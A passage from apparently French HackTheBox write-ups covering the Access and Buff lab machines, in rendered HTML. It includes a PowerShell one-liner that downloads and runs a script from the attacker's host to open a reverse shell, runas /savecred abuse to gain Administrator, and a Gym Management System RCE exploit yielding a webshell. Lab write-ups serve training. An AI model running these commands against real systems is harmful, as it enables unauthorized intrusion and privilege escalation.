class="k">for</span> the <span class="p">&amp;</span><span class="c1">#8220;security&amp;#8221; account has been changed to 4Cc3ssC0ntr0ller.&amp;nbsp; Please ensure this is passed on to your engineers.&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;p class=MsoNormal&gt;&lt;o:p&gt;&amp;nbsp;&lt;/o:p&gt;&lt;/p&gt;&lt;p class=MsoNormal&gt;Regards,&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;p class=MsoNormal&gt;John&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;/div&gt;&lt;/body&gt;&lt;/html&gt;</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="telnet---security-account">TELNET - security account </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Access/Access Control<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ telnet 10.10.10.98 <span class="m">23</span> </span></span><span class="line"><span class="cl">Trying 10.10.10.98... </span></span><span class="line"><span class="cl">Connected to 10.10.10.98. </span></span><span class="line"><span class="cl">Escape character is <span class="s1">&#39;^]&#39;</span>. </span></span><span class="line"><span class="cl">Welcome to Microsoft Telnet Service </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">login: security </span></span><span class="line"><span class="cl">password: 4Cc3ssC0ntr0ller </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">*<span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Microsoft Telnet Server. </span></span><span class="line"><span class="cl">*<span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">C:<span class="se">\U</span>sers<span class="se">\s</span>ecurity&gt;type Desktop<span class="se">\u</span>ser.txt </span></span><span class="line"><span class="cl">9535.....3f75 </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="powershell">Powershell </h3><p>Si j&rsquo;écris simplement &ldquo;powershell&rdquo;, un powershell semble s&rsquo;ouvrir mais n&rsquo;est pas stable. J&rsquo;ai donc dû ouvrir un reverse shell pour obtenir un powershell stable :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">----------KALI------------ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Access<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ python3 -m http.server <span class="m">8888</span> </span></span><span class="line"><span class="cl">Serving HTTP on 0.0.0.0 port <span class="m">8888</span> <span class="o">(</span>http://0.0.0.0:8888/<span class="o">)</span> ... </span></span><span class="line"><span class="cl">10.10.10.98 - - <span class="o">[</span>16/Feb/2025 17:04:22<span class="o">]</span> <span class="s2">&#34;GET /Invoke.ps1 HTTP/1.1&#34;</span> <span class="m">200</span> - </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">----------KALI------------ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Access<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1337</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.16.9<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.98<span class="o">]</span> <span class="m">49165</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Windows PowerShell running as user security on ACCESS </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>C<span class="o">)</span> <span class="m">2015</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\s</span>ecurity&gt;PS C:<span class="se">\U</span>sers<span class="se">\s</span>ecurity&gt; whoami </span></span><span class="line"><span class="cl">access<span class="se">\s</span>ecurity </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">---------WINDOWS---------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\U</span>sers<span class="se">\s</span>ecurity&gt;powershell /C IEX<span class="o">(</span>New-Object Net.WebClient<span class="o">)</span>.downloadString<span class="o">(</span><span class="s1">&#39;http://10.10.16.9:8888/Invoke.ps1&#39;</span><span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="zkaccesslnk">ZKAccess.lnk </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\s</span>ecurity&gt; <span class="nb">cd</span> ../Public </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\P</span>ublic&gt; <span class="nb">cd</span> Desktop </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\P</span>ublic<span class="se">\D</span>esktop&gt; ls </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory: C:<span class="se">\U</span>sers<span class="se">\P</span>ublic<span class="se">\D</span>esktop </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">-a--- 8/22/2018 10:18 PM <span class="m">1870</span> ZKAccess3.5 Security System.lnk </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\P</span>ublic<span class="se">\D</span>esktop&gt; cat Z* </span></span><span class="line"><span class="cl">L?F?@ ??7???7???#?P/P?O? ?:i?+00?/C:<span class="se">\R</span>1M?:Windows???:?▒M?:*wWindowsV1MV?System32???:?▒MV?*?System32▒X2P?:? </span></span><span class="line"><span class="cl"> runas.exe???:1??:1?*Yrunas.exe▒L-K??E?C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\r</span>unas.exe#..<span class="se">\.</span>.<span class="se">\.</span>.<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\r</span>unas.exeC:<span class="se">\Z</span>KTeco<span class="se">\Z</span>KAccess3.5G/user:ACCESS<span class="se">\A</span>dministrator /savecred <span class="s2">&#34;C:\ZKTeco\ZKAccess3.5\Access.exe&#34;</span><span class="err">&#39;</span>C:<span class="se">\Z</span>KTeco<span class="se">\Z</span>KAccess3.5<span class="se">\i</span>mg<span class="se">\A</span>ccessNET.ico?%SystemDrive%<span class="se">\Z</span>KTeco<span class="se">\Z</span>KAccess3.5<span class="se">\i</span>mg<span class="se">\A</span>ccessNET.ico%SystemDrive%<span class="se">\Z</span>KTeco<span class="se">\Z</span>KAccess3.5<span class="se">\i</span>mg<span class="se">\A</span>ccessNET.ico?%? </span></span><span class="line"><span class="cl"> ?wN?▒?<span class="o">]</span>N?D.??Q???<span class="sb">`</span>?Xaccess?_???8<span class="o">{</span>E?3 </span></span><span class="line"><span class="cl"> O?j<span class="o">)</span>?H??? </span></span><span class="line"><span class="cl"> <span class="o">)</span>??<span class="o">[</span>?_???8<span class="o">{</span>E?3 </span></span><span class="line"><span class="cl"> O?j<span class="o">)</span>?H??? </span></span><span class="line"><span class="cl"> <span class="o">)</span>??<span class="o">[</span>? ??1SPS??XF?L8C???<span class="p">&amp;</span>?m?e*S-1-5-21-953262931-566350628-63446256-500 </span></span></code></pre></td></tr></table> </div> </div><p>En fouillant dans les dossiers, on trouve un fichier ZKAccess.lnk qui semble executer un binaire &ldquo;Access.exe&rdquo; avec des droits élévé :</p> <blockquote> <p>Windows\System32\runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred &ldquo;C:\ZKTeco\ZKAccess3.5\Access.exe On observe l&rsquo;utilisation de runas, pour executer un fichier en tant qu&rsquo;un utilisateur spécifique. En l&rsquo;occurence, ici, il s&rsquo;agit de l&rsquo;Administrator (celui qui nous intéresse). Apparement les creds de l&rsquo;administrateur sont enregistrés, et on peut executer n&rsquo;importe quelle commande en tant qu&rsquo;Administrator en utilisant l&rsquo;argument /savecred.</p> </blockquote> <p>On tente d&rsquo;utiliser à nouveau notre script Invoke.ps1 pour ouvrir un reverseshell de type powershell en tant qu&rsquo;Administrator, et ça fonctionne. On a changé le port dans le Invoke.ps1 bien sûr car le port est déjà utiliser sur la kali pour le powershell actuel.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\s</span>ecurity&gt; runas /user:ACCESS<span class="se">\A</span>dministrator /savecred <span class="s2">&#34;powershell /C IEX(New-Object Net.WebClient).downloadString(&#39;http://10.10.16.9:8888/Invoke.ps1&#39;)&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">--------KALI--------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Access<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nc -lnvp <span class="m">1339</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1339</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.16.9<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.98<span class="o">]</span> <span class="m">49216</span> </span></span><span class="line"><span class="cl">Windows PowerShell running as user Administrator on ACCESS </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>C<span class="o">)</span> <span class="m">2015</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt;whoami </span></span><span class="line"><span class="cl">access<span class="se">\a</span>dministrator </span></span><span class="line"><span class="cl">PS C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt; <span class="nb">cd</span> C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator&gt; <span class="nb">cd</span> Desktop </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt; ls </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory: C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">-ar-- 2/16/2025 6:02 PM <span class="m">34</span> root.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt; cat root.txt </span></span><span class="line"><span class="cl">339f.....e901 </span></span></code></pre></td></tr></table> </div> </div><h2 id="tips">Tips </h2><ul> <li>Toujours fouiller les dossiers des utilisateurs accessibles, avant d&rsquo;effectuer un <strong>winPEAS</strong>.</li> </ul>https://leopoldabgn.github.io/writeups/p/buff-htb/Sun, 12 Jan 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/buff-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Buff cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Buff</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Windows</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.198</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="ip">IP </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">10.10.10.198 </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sS -sV -An -p- -vvv -T4 10.10.10.198 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">7680/tcp open pando-pub? syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">8080/tcp open http syn-ack ttl <span class="m">127</span> Apache httpd 2.4.43 <span class="o">((</span>Win64<span class="o">)</span> OpenSSL/1.1.1g PHP/7.4.6<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> http-open-proxy: Potentially OPEN proxy. </span></span><span class="line"><span class="cl"><span class="p">|</span>_Methods supported:CONNECTION </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: mrb3n<span class="err">&#39;</span>s Bro Hut </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD POST OPTIONS </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.43 <span class="o">(</span>Win64<span class="o">)</span> OpenSSL/1.1.1g PHP/7.4.6 </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="directory-enumeration--buffhtb---port-8080">Directory enumeration : buff.htb - port 8080 </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ gobuster dir -u http://buff.htb:8080/ -t <span class="m">50</span> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Gobuster v3.6 </span></span><span class="line"><span class="cl">by OJ Reeves <span class="o">(</span>@TheColonial<span class="o">)</span> <span class="p">&amp;</span> Christian Mehlmauer <span class="o">(</span>@firefart<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Url: http://buff.htb:8080/ </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Method: GET </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Threads: <span class="m">50</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Negative Status codes: <span class="m">404</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> User Agent: gobuster/3.6 </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Timeout: <span class="nv">10s</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Starting gobuster in directory enumeration <span class="nv">mode</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">/profile <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 337<span class="o">]</span> <span class="o">[</span>--&gt; http://buff.htb:8080/profile/<span class="o">]</span> </span></span><span class="line"><span class="cl">/img <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 333<span class="o">]</span> <span class="o">[</span>--&gt; http://buff.htb:8080/img/<span class="o">]</span> </span></span><span class="line"><span class="cl">/upload <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 336<span class="o">]</span> <span class="o">[</span>--&gt; http://buff.htb:8080/upload/<span class="o">]</span> </span></span><span class="line"><span class="cl">/license <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 18025<span class="o">]</span> </span></span><span class="line"><span class="cl">/include <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 337<span class="o">]</span> <span class="o">[</span>--&gt; http://buff.htb:8080/include/<span class="o">]</span> </span></span><span class="line"><span class="cl">/examples <span class="o">(</span>Status: 503<span class="o">)</span> <span class="o">[</span>Size: 1054<span class="o">]</span> </span></span><span class="line"><span class="cl">/licenses <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1199<span class="o">]</span> </span></span><span class="line"><span class="cl">/Profile <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 337<span class="o">]</span> <span class="o">[</span>--&gt; http://buff.htb:8080/Profile/<span class="o">]</span> </span></span><span class="line"><span class="cl">/LICENSE <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 18025<span class="o">]</span> </span></span><span class="line"><span class="cl">/att <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 333<span class="o">]</span> <span class="o">[</span>--&gt; http://buff.htb:8080/att/<span class="o">]</span> </span></span><span class="line"><span class="cl">/%20 <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1040<span class="o">]</span> </span></span><span class="line"><span class="cl">/IMG <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 333<span class="o">]</span> <span class="o">[</span>--&gt; http://buff.htb:8080/IMG/<span class="o">]</span> </span></span><span class="line"><span class="cl">/License <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 18025<span class="o">]</span> </span></span><span class="line"><span class="cl">/ex <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 332<span class="o">]</span> <span class="o">[</span>--&gt; http://buff.htb:8080/ex/<span class="o">]</span> </span></span><span class="line"><span class="cl">/*checkout* <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1040<span class="o">]</span> </span></span><span class="line"><span class="cl">/Img <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 333<span class="o">]</span> <span class="o">[</span>--&gt; http://buff.htb:8080/Img/<span class="o">]</span> </span></span><span class="line"><span class="cl">/boot <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 334<span class="o">]</span> <span class="o">[</span>--&gt; http://buff.htb:8080/boot/<span class="o">]</span> </span></span><span class="line"><span class="cl">/Upload <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 336<span class="o">]</span> <span class="o">[</span>--&gt; http://buff.htb:8080/Upload/<span class="o">]</span> </span></span><span class="line"><span class="cl">/phpmyadmin <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1199<span class="o">]</span> </span></span><span class="line"><span class="cl">/webalizer <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1040<span class="o">]</span> </span></span><span class="line"><span class="cl">/*docroot* <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1040<span class="o">]</span> </span></span><span class="line"><span class="cl">/* <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1040<span class="o">]</span> </span></span><span class="line"><span class="cl">/con <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1040<span class="o">]</span> </span></span><span class="line"><span class="cl">/Include <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 337<span class="o">]</span> <span class="o">[</span>--&gt; http://buff.htb:8080/Include/<span class="o">]</span> </span></span><span class="line"><span class="cl">/http%3A <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1040<span class="o">]</span> </span></span><span class="line"><span class="cl">/**http%3a <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1040<span class="o">]</span> </span></span><span class="line"><span class="cl">/*http%3A <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1040<span class="o">]</span> </span></span><span class="line"><span class="cl">/aux <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1040<span class="o">]</span> </span></span><span class="line"><span class="cl">/Boot <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 334<span class="o">]</span> <span class="o">[</span>--&gt; http://buff.htb:8080/Boot/<span class="o">]</span> </span></span><span class="line"><span class="cl">/**http%3A <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1040<span class="o">]</span> </span></span><span class="line"><span class="cl">/%C0 <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1040<span class="o">]</span> </span></span><span class="line"><span class="cl">/server-status <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1199<span class="o">]</span> </span></span><span class="line"><span class="cl">/%3FRID%3D2671 <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1040<span class="o">]</span> </span></span><span class="line"><span class="cl">/devinmoore* <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1040<span class="o">]</span> </span></span><span class="line"><span class="cl">/Ex <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 332<span class="o">]</span> <span class="o">[</span>--&gt; http://buff.htb:8080/Ex/<span class="o">]</span> </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><p>Le /ex est intéressant et indique des infos avec une erreur mysqli !</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Warning: mysqli::__construct<span class="o">()</span>: <span class="o">(</span>HY000/1049<span class="o">)</span>: Unknown database <span class="s1">&#39;secure_login&#39;</span> in C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs<span class="se">\g</span>ym<span class="se">\e</span>x<span class="se">\i</span>nclude<span class="se">\d</span>b_connect.php on line <span class="m">3</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="gym-management-system-10---unauthenticated-rce">Gym Management System 1.0 - Unauthenticated RCE </h3><p>On recherche &ldquo;Gym&rdquo; dans searchsploit ou sur internet on trouve rapidement un exploit python permettant d&rsquo;uploader un fichier php et d&rsquo;executer n&rsquo;importe quelle commande.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ python3 exploit2.py http://buff.htb:8080/ </span></span><span class="line"><span class="cl">/home/kali/htb/Buff/exploit2.py:77: SyntaxWarning: invalid escape sequence <span class="s1">&#39;\/&#39;</span> </span></span><span class="line"><span class="cl"> <span class="nv">SIG</span> <span class="o">+=</span> BL+<span class="s1">&#39; \/&#39;</span>+RS+<span class="s1">&#39;\n&#39;</span> </span></span><span class="line"><span class="cl"> /<span class="se">\ </span></span></span><span class="line"><span class="cl">/vvvvvvvvvvvv <span class="se">\-</span>-------------------------------------, </span></span><span class="line"><span class="cl"><span class="sb">`</span>^^^^^^^^^^^^ /<span class="o">============</span><span class="nv">BOKU</span><span class="o">=====================</span><span class="s2">&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"> \/ </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">[+] Successfully connected to webshell. </span></span></span><span class="line"><span class="cl"><span class="s2">C:\xampp\htdocs\gym\upload&gt; powershell cat ../../../../Users/shaun/Desktop/user.txt </span></span></span><span class="line"><span class="cl"><span class="s2">PNG </span></span></span><span class="line"><span class="cl"><span class="s2">▒ </span></span></span><span class="line"><span class="cl"><span class="s2">b6a5....ce0d3 </span></span></span></code></pre></td></tr></table> </div> </div><h3 id="stablize-shell">Stablize shell </h3><div 